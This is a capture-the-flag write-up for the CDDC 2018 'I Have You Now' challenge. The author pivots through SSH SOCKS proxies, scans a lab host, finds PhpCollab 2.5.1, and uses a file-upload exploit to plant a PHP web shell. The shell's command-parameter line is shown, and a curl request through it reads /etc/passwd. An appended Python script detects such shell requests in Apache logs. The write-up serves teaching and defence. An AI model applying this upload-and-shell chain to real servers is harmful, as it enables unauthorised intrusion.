CDDC 2018: I Have You Now

Category: Kamikaze
Points: 239
Description:

  1. From your position on target, exploit the target and gain access to the file '/etc/passwd'.
  2. Inside the file, identify the UID of the user whose username starts with the case-sensitive letter 'C'.
  3. Enter the correct UID value into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.


After that nmap fun, we continue. This challenge took me a fair bit but instead of wasting time on finding the exploit, I was tinkering with my proxy setup. I ended up using a version of a multi-hop SSH relay to do the hacking locally. The setup of the proxy is something like this,

root@ctf:~# ssh -L 1080: -4
root@'s password: 
Last login: Sat Jun  2 17:36:11 2018 from
[root@fw2018 ~]# ssh -D 1081 hero@ -4
hero@'s password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-111-generic x86_64)

 * Documentation:

  System information as of Sat Jun  2 09:26:06 UTC 2018

  System load:  0.0               Processes:           82
  Usage of /:   21.6% of 9.81GB   Users logged in:     0
  Memory usage: 3%                IP address for eth0:
  Swap usage:   0%

  Graph this data and manage this system at:

  Get cloud support with Ubuntu Advantage Cloud Guest:

17 packages can be updated.
15 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2019.

Last login: Sat Jun  2 09:26:06 2018 from

Now to access the internal network like I was, I would just proxy everything through, in a SOCKS5 manner.

So, first up, would be to nmap our target,

root@ctf:~# proxychains4 nmap -sT -sV
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/

Starting Nmap 7.60 ( ) at 2018-06-02 10:56 UTC
Nmap scan report for
Host is up (0.045s latency).
Not shown: 997 closed ports
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.15 ((CentOS))
3306/tcp open  mysql   MySQL (unauthorized)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 57.01 seconds

Okay, so we have a couple of services and an interesting MySQL server. What do we do now? Well, let's try exploring our options! First, let's try the most obvious apple in the bucket,

root@ctf:~# proxychains4 nc 3306
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
h?jHost 'cddc-t041-ot-svr1.c.bitnami-qivcfh0ekq.internal' is not allowed to connect to this MySQL server

That doesn't seem to work, let's try the Apache server. At our first glance, the server seems to be entirely unconfigured.

root@ctf:~# proxychains4 curl
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
    <h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>

Let's whip out the dirbuster applications and see what we can find,

msf >  use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set rhosts
rhosts =>
msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[+] Found 403 (
[+] Found 403 (
[+] Found 200 (
[+] Found 302 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So, some interesting directories. Let's take a gander at the 302 redirection and in here, we find an interesting application.

root@ctf:~# proxychains4 curl -L
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Powered by PhpCollab v2.5.1 //-->
<meta http-equiv='Content-Type' content="text/html; charset=ISO-8859-1" />
<meta name='robots' content='none' />
<meta name='description' content='Groupware module. Manage web projects with team collaboration, users management, tasks and projects tracking, files approval tracking, project sites clients access, customer relationship management (Php / Mysql, PostgreSQL or Sql Server).' />
<meta name='keywords' content='PhpCollab,, Sourceforge, management, web, projects, tasks, organizations, reports, Php, MySql, Sql Server, mssql, Microsoft Sql Server, PostgreSQL, module, application, module, file management, project site, team collaboration, free, crm, CRM, cutomer relationship management, workflow, workgroup' />
<meta name='copyright' content='PHPCollab' />
<script type='text/Javascript'>
var gBrowserOK = true;
var gOSOK = true;
var gCookiesOK = true;
var gFlashOK = true;
// -->
<script type='text/javascript' src='../javascript/general.js'></script>
<script type='text/JavaScript' src='../javascript/overlib_mini.js'></script>
<link rel='stylesheet' href='../themes/default/stylesheet.css' type='text/css' />

<body onLoad='document.loginForm.loginForm.focus();'><div id='overDiv' style='position:absolute; visibility:hidden; z-index:1000;'></div>

<p id="header"><img src="../logos_clients/1.php" border="0" alt=""></p>

<p id='account'>&nbsp;</p>

<p id='navigation'><a href='../general/login.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>Log In</a>&nbsp;&nbsp;<a href='../general/systemrequirements.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>System Requirements</a>&nbsp;&nbsp;<a href='../general/license.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>License</a></p>

<p class='breadcrumbs'>&nbsp;</p>

<a name='loginAnchor'></a>

<form accept-charset='UNKNOWN' method='POST' action='../general/login.php?auth=test&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4' name='loginForm' enctype='application/x-www-form-urlencoded'>

<h1 class="heading">PhpCollab : Log In</h1>

<table class='content' cellspacing='0' cellpadding='0'><tr><th colspan='2'>Please log in</th></tr><tr class='odd'><td valign='top' class='leftvalue'>Language :</td><td><select name="defaultLanguage"><option value="ar">Arabic</option><option value="az">Azerbaijani</option><option value="pt-br">Brazilian Portuguese</option><option value="bg">Bulgarian</option><option value="ca">Catalan</option><option value="zh">Chinese simplified</option><option value="zh-tw">Chinese traditional</option><option value="cs-iso">Czech (iso)</option><option value="cs-win1250">Czech (win1250)</option><option value="da">Danish</option><option value="nl">Dutch</option><option value="en" selected>English</option><option value="et">Estonian</option><option value="fr">French</option><option value="de">German</option><option value="hu">Hungarian</option><option value="is">Icelandic</option><option value="in">Indonesian</option><option value="it">Italian</option><option value="ja">Japanese</option><option value="ko">Korean</option><option value="lv">Latvian</option><option value="no">Norwegian</option><option value="pl">Polish</option><option value="pt">Portuguese</option><option value="ro">Romanian</option><option value="ru">Russian</option><option value="sk-win1250">Slovak (win1250)</option><option value="es">Spanish</option><option value="tr">Turkish</option><option value="uk">Ukrainian</option></select>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>* User Name :</td><td><input value='' type='text' name='loginForm'>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>* Password :</td><td><input value='' type='password' name='passwordForm'>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>&nbsp;</td><td><input type='submit' name='save' value='Log In'><br/><br/><br/><a href='../general/sendpassword.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>Forgot password ?</a>&nbsp;</td></tr>
<hr />
<p id="footer">PhpCollab v2.5.1 </p>


What's PhpCollab anyways? Well, it's some weird application; its purpose isn't important. What matters is that we now have a name and a version. A fast Google gives us an exploit for arbitrary file upload.

Since with that exploit, we can upload anything we want, let's dummy up a simple PHP shell page.

    $cmd = ($_REQUEST['cmd']);

Proceed to upload it,

root@ctf:~# proxychains4 ./ 1 shell.php 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
[*] Trying to exploit with URL :
[OK] Backdoor link :

Now that our payload PHP shell has been uploaded at, we can get our hacking done!

root@ctf:~# proxychains4 curl '' --data 'cmd=cat /etc/passwd'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  ...  ...  OK
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

Therefore, the flag is Chris.
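
From the defender's side, the request that ran the uploaded shell stands out in the web server's access log as a script served out of an upload directory. The following added example (not part of the original write-up) flags such requests in Apache combined-format logs; the log lines, the `/phpcollab/` prefix and the choice of `logos_clients/` (the directory the login page's header image points at) as the upload directory are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: uploads land in logos_clients/; adjust for the real deployment.
UPLOAD_DIRS = ("/logos_clients/",)

# Extensions PHP handlers commonly execute, including double extensions
# (shell.php.jpg) and PATH_INFO suffixes (shell.php/x).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|/|$)", re.IGNORECASE)

# Apache combined log format, up to and including the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
192.0.2.10 - - [02/Jun/2018:11:02:13 +0000] "GET /phpcollab/general/login.php HTTP/1.1" 200 5120 "-" "curl/7.58.0"
192.0.2.10 - - [02/Jun/2018:11:05:40 +0000] "GET /phpcollab/logos_clients/2.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.10 - - [02/Jun/2018:11:09:01 +0000] "POST /phpcollab/logos_clients/1.php HTTP/1.1" 200 1033 "-" "curl/7.58.0"
198.51.100.7 - - [02/Jun/2018:11:09:30 +0000] "GET /phpcollab/logos_clients/9.php HTTP/1.1" 404 210 "-" "curl/7.58.0"
198.51.100.7 - - [02/Jun/2018:11:10:02 +0000] "GET /phpcollab/logos_clients/3.PHP5?x=1 HTTP/1.1" 200 44 "-" "curl/7.58.0"
"""

def suspicious_hits(lines):
    """Return (ip, method, path, status) for scripts served from an upload dir."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        # Decode the path so %2e-style encodings do not hide the extension.
        path = unquote(urlsplit(m["target"]).path)
        in_upload = any(d in path.lower() for d in UPLOAD_DIRS)
        # A 2xx status means the file exists and was served, not just probed.
        if in_upload and SCRIPT_EXT.search(path) and m["status"].startswith("2"):
            hits.append((m["ip"], m["method"], path, int(m["status"])))
    return hits

if __name__ == "__main__":
    for hit in suspicious_hits(SAMPLE_LOG.splitlines()):
        print("script served from upload dir:", hit)
```

An upload directory has no reason to execute scripts, so the same path rule doubles as a hardening target for the web server configuration.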
